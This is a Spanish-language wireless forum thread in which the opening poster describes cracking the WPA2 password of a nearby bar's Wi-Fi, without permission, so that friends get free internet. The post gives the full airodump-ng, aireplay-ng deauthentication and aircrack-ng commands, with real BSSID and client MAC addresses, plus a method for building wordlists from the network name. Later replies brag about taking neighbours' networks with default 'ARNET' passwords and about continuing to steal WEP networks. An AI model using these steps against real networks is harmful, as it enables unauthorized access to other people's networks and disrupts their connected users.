24 de Noviembre de 2017, 04:59:19 pm
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2  (Leído 10026 veces)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.117
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« en: 28 de Abril de 2011, 07:31:36 pm »
 :o resulta que hoy crackie mi primer WPA2, todo un logro... y lo mí¡s comín es que lo hice razonando y aplicando un poco de lo que se llama "Ingenierí­a Social".

NOTA: este metodo puede o no funcionar, en mi caso fue simplemente un razonamiento aplicado a esta red. Pueda que nunca crackies un WPA/WPA2 con este funcionamiento.

LA HISTORIA:

resulta que estando con un par de amigos encontramos una red con buena calidad que era de un bar cercano llamado "Viejo Correo" y todos los pibes como me conocen... -Che, hackiate la red esa asi tenemos internet...- tipico como si fuera tan facil y bueno lo primero que hice fue ver el cifrado, cuando vi que era WPA2 con PSK (CCMP) les dije que era gratamente imposible, ya que es un cifrado muy sofisticado. entonces me dicen -y bueno proba haber que onda...- y bueno lo hice....

PROCEDIMIENTOS:

1.- la red se llamaba "Viejo Correo", se llamaba asi porque esta enfrente de un Correo; entonces cree un diccionario con palabras clave como:

correo
correozona
zonacorreo
correoviejo
correobar
correoviejobar
correobarviejo


y asi fui pensando contraseíñas que le podrian haber puesto. desde ya que la lista era un poco mí¡s larga. despues con el SGen fui creando diccionarios pero agregandole a cada palabra numeros; tome como referencia 4 numeros fue pura casualidad; enconces genere un diccionario con cada palabra + numero de 4 cifras. ejemplo:

correo0000 -> correo9999
correozona0000 -> correozona9999
correobarviejo0000 -> correobarviejo9999


aun asi sin saber el rango de digitos de la contraseíña pence que tendria que ser chica para que los clientes puedan escribirla ellos mismos. Enconces junte todo en un diccionario y me fui al AirUbuntu 10.04.

CRACKEO:

primero lance un airodump-ng para ver la informacion de la red.

Código: [Seleccionar]
airodump-ng -w cap mon0


luego hice:

Código: [Seleccionar]
airodump-ng -c 11 -w viejocorreo --bssid 54:E6:FC:AB:0B:48 mon0

ya ahora estaba capturando los #Datas. Espere a ver todos los users y seleccione el user con mayor transferencia de Paquetes.

Luego lance el Aireplay:

Código: [Seleccionar]
aireplay-ng -0 5 -a 54:E6:FC:AB:0B:48 -c 1C:4B:D6:68:92:2B mon0

sale handshake en airodump-ng y continuo con el crack:

Código: [Seleccionar]
aircrack-ng -w /home/diccionario.lst -b 54:E6:FC:AB:0B:48 viejocorreo-01.cap

y comenzo a crackear y a los pocos segundos ya la tenia crackeada, me quede duro de saber que la crackie sin ningun diccionario de 30GB que talves ni siquiera tenga la contraseíña. lo raro fue que las key que probí, figuran 8 pero probo como 3000... jjeje fue mí¡s pura suerte, los pibes se quedaron re contentos... jajaj  :'(



Comprobando la contraseíña:



TIPS PARA TENER EN CUENTA:
* nombre o nombres posibles de personas.
* ver el nombre de la red y preguntarnos ¿Que password le pondria?
* agragarle numero com referencia.
« Última modificación: 28 de Abril de 2011, 07:55:06 pm por † Välh † »
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado diego10

  • Premio
  • Usuario
  • *
  • Mensajes: 1.608
  • Reputación: +2171/-70
  • awards Usuario con más de 1000 Posts! Usuario Registrado
    • Arg-Wireless. El primer foro de wireless de Argentina
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #1 en: 28 de Abril de 2011, 07:50:02 pm »
jaja buena data... yo de fiaca no pruebo crackear WPA con esta iMac.. es leeenta
ahora cuando en breve tenga la nueva iMac i5 con sandy bridge y thunderbolt

YA VAN A VEEER !!  :o

PD: de un minuto a otro Apple la saca del horno bien al dente
« Última modificación: 28 de Abril de 2011, 07:51:49 pm por diego_dieguez »
  • Antenas: https://www.youtube.com/user/MrDiegodieguez
  • Sistemas Operativos: macOS High Sierra 10.13.1 (17B48)
  • Sistemas Operativos que utilizo para Auditar: macOS High Sierra 10.13.1 (17B48)
  • Dispositivos Inalambricos: ALFA AWUS036H + 3x TPSTATION WA5210G + AirPort Time Capsule 2TB + Mikrotik RB941-2nD hAP lite

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.117
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #2 en: 28 de Abril de 2011, 07:52:30 pm »
jaja buena data... yo de fiaca no pruebo crackear WPA con esta iMac.. es leeenta
ahora cuando en breve tenga la nueva iMac i5 con sandy bridge y thunderbolt

YA VAN A VEEER !!  :o

si yo tengo aca por la zona dos WPA y una WPA2; tengo que ver haber como le mado con el john y la dejo 30 aíños a que termine y me diga no se ha encontrado la contraseíña.
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado diego10

  • Premio
  • Usuario
  • *
  • Mensajes: 1.608
  • Reputación: +2171/-70
  • awards Usuario con más de 1000 Posts! Usuario Registrado
    • Arg-Wireless. El primer foro de wireless de Argentina
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #3 en: 28 de Abril de 2011, 08:35:44 pm »
yo tengo varias WPA/WPA2 pero solo quiero internet  :P


http://www.picturestack.com/33/763/r9ZUntitleduca.png
« Última modificación: 01 de Mayo de 2011, 01:56:17 am por † Välh † »
  • Antenas: https://www.youtube.com/user/MrDiegodieguez
  • Sistemas Operativos: macOS High Sierra 10.13.1 (17B48)
  • Sistemas Operativos que utilizo para Auditar: macOS High Sierra 10.13.1 (17B48)
  • Dispositivos Inalambricos: ALFA AWUS036H + 3x TPSTATION WA5210G + AirPort Time Capsule 2TB + Mikrotik RB941-2nD hAP lite

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.117
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #4 en: 28 de Abril de 2011, 08:41:28 pm »
yo tengo varias WPA/WPA2 pero solo quiero internet  :P

http://www.picturestack.com/33/763/r9ZUntitleduca.png

jaja es gente que sabe... jejej... yo crackie uno hace un tiempo, ahora le mando WPA2... jajaj para mi que se entero.  ???

aca me llueven las "Wi-Fi Arnet" contraseíña ARNET, un amigo mio me dice -che tengo mi vecino que tiene la red "Wi-Fi Arnet" como la crackeo?- le digo: pone ARNET y listo, de seguro es esa... era esa... estaba re feliz...
« Última modificación: 28 de Abril de 2011, 08:55:22 pm por † Välh † »
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado spikeich

  • Mensajes: 75
  • Reputación: +7/-0
  • Association successful :-)
  • awards Usuario con más de 10 Posts!
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #5 en: 28 de Abril de 2011, 11:57:55 pm »
jaja buena data... yo de fiaca no pruebo crackear WPA con esta iMac.. es leeenta
ahora cuando en breve tenga la nueva iMac i5 con sandy bridge y thunderbolt

YA VAN A VEEER !!  :o

PD: de un minuto a otro Apple la saca del horno bien al dente

mmmm bababaaaaa q linda una imac i5!!!! te digo ya de una ponele 8gb! por q consume mucho igual q la pro!! la mia le tube q poner 8gb por q se me traba todo con el safari y los virtual abiertos!!

por lo otro wpa2 me da mucha fiaca!! ya cuando veo una digo mmmm cuantas horas puedo tardar!!! hasta ahora voy 0!!

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.117
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #6 en: 01 de Mayo de 2011, 02:10:22 am »
mmmm bababaaaaa q linda una imac i5!!!! te digo ya de una ponele 8gb! por q consume mucho igual q la pro!! la mia le tube q poner 8gb por q se me traba todo con el safari y los virtual abiertos!!

por lo otro wpa2 me da mucha fiaca!! ya cuando veo una digo mmmm cuantas horas puedo tardar!!! hasta ahora voy 0!!

128bit AES:

« Última modificación: 01 de Mayo de 2011, 02:11:58 am por † Välh † »
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado spikeich

  • Mensajes: 75
  • Reputación: +7/-0
  • Association successful :-)
  • awards Usuario con más de 10 Posts!
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #7 en: 03 de Mayo de 2011, 05:06:43 pm »
D3M0N con esa imagen q pusiste fue para sacarme todas las ganas de probar como sacar un wpa?? dios digamos q no se invento maquina por ahora y por un buen tiempo para poder sacar una 128bits AES en minutos!! a seguir robando wep!! espero q la gente no se avive por un buen tiempo de las vulnerabilidades de las wep

Desconectado diego10

  • Premio
  • Usuario
  • *
  • Mensajes: 1.608
  • Reputación: +2171/-70
  • awards Usuario con más de 1000 Posts! Usuario Registrado
    • Arg-Wireless. El primer foro de wireless de Argentina
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #8 en: 03 de Mayo de 2011, 09:34:03 pm »
puedo equivocarme pero tengo entendido que la gente usa WEP porque es una mala recomendacion de windows en cuanto a seguridad...
« Última modificación: 03 de Mayo de 2011, 09:44:03 pm por diego_dieguez »
  • Antenas: https://www.youtube.com/user/MrDiegodieguez
  • Sistemas Operativos: macOS High Sierra 10.13.1 (17B48)
  • Sistemas Operativos que utilizo para Auditar: macOS High Sierra 10.13.1 (17B48)
  • Dispositivos Inalambricos: ALFA AWUS036H + 3x TPSTATION WA5210G + AirPort Time Capsule 2TB + Mikrotik RB941-2nD hAP lite

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.117
  • Reputación: +247/-3
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #9 en: 03 de Mayo de 2011, 10:15:59 pm »
igual es muy dificil que una personal use wpa2 mí¡s aun, todabia hay muchos que nisiquiera WEP le ponen... jajja... tenes el tipo que tiene 3MB y la deja libre y el probre que tiene 1MB y le pone WEP... jjajja

para el tipico que se pone internet y no tiene idea ni que hace el router, tiene al tecnico de instalacion que se la deja facil, le pone WEP y contraseíña ARNET... jajaja pero es verdad.  :-X

lo bueno que por lo menos no encontre la tipica contraseíña 12345, me muero si llego a crackear una red asi...  :-\
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado spikeich

  • Mensajes: 75
  • Reputación: +7/-0
  • Association successful :-)
  • awards Usuario con más de 10 Posts!
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #10 en: 03 de Mayo de 2011, 10:31:39 pm »
ese dia nos morimos todos! jajajajja

Desconectado himan20

  • Usuario
  • *
  • Mensajes: 1
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #11 en: 20 de Mayo de 2013, 01:40:50 am »
no no no!!!!!! que mal era mal facil invitarle una cerveza  a un borracho que tenga lap cel tablet ...!!!!jajajajaj eso es ingenieria social o ya de a perdis decir al del bar que te deje checar el correo !!!!!la mayoria pasa la clave ..por que saben que solo la ivas a ocupar 5 minutos asta le pagas lo de 2 cervezas hai que pensar amigo
  • Antenas: 9Dbi
  • Sistemas Operativos: zorin os
  • Sistemas Operativos que utilizo para Auditar: backtrack 5 r3
  • Dispositivos Inalambricos: tplink 1000 Watts

Desconectado Grueso Calibre

  • Usuario
  • *
  • Mensajes: 31
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2
« Respuesta #12 en: 21 de Mayo de 2013, 08:51:32 pm »
Yo ya me morí hace dos meses cuando después de renegar un buen tiempo con una red de Arnet me apareció la contraseña 12345, casi me caigo de C _ _ _.

igual es muy dificil que una personal use wpa2 mí¡s aun, todabia hay muchos que nisiquiera WEP le ponen... jajja... tenes el tipo que tiene 3MB y la deja libre y el probre que tiene 1MB y le pone WEP... jjajja

para el tipico que se pone internet y no tiene idea ni que hace el router, tiene al tecnico de instalacion que se la deja facil, le pone WEP y contraseíña ARNET... jajaja pero es verdad.  :-X

lo bueno que por lo menos no encontre la tipica contraseíña 12345, me muero si llego a crackear una red asi...  :-\
  • Antenas: Grillada de 23 dbi
  • Sistemas Operativos: XP, Seven, Windows 8
  • Sistemas Operativos que utilizo para Auditar: WifiWay 3.4
  • Dispositivos Inalambricos: Alfa 2W, y algun otro que no recuerdo